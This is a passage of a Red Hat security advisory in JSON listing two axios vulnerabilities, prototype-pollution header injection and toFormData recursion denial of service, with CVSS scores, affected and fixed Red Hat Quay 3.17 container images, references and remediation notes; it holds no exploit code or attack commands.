          "url": "https://access.redhat.com/security/cve/CVE-2026-42035"
        },
        {
          "category": "external",
          "summary": "RHBZ#2461606",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461606"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-42035",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42035"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42035",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42035"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-6chq-wfr3-2hj9",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-6chq-wfr3-2hj9"
        }
      ],
      "release_date": "2026-04-24T17:38:07.752000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T13:10:36+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22465"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Moderate"
        }
      ],
      "title": "axios: Axios: Arbitrary HTTP header injection via prototype pollution"
    },
    {
      "cve": "CVE-2026-42039",
      "cwe": {
        "id": "CWE-770",
        "name": "Allocation of Resources Without Limits or Throttling"
      },
      "discovery_date": "2026-04-24T19:01:44.887156+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2461630"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, a promise-based HTTP client for browsers and Node.js. This vulnerability occurs because the `toFormData` function recursively processes nested objects without a depth limit. A remote attacker can exploit this by sending deeply nested request data, which causes the Node.js process to crash due to a RangeError, leading to a potential Denial of Service (DoS) if the process crashes.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Node.js: Axios: Denial of Service via unbounded recursion in toFormData with deeply nested request data",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-42039"
        },
        {
          "category": "external",
          "summary": "RHBZ#2461630",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461630"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-42039",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42039"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42039",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42039"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-62hf-57xw-28j9",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-62hf-57xw-28j9"
        }
      ],
      "release_date": "2026-04-24T18:01:30.775000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T13:10:36+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22465"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
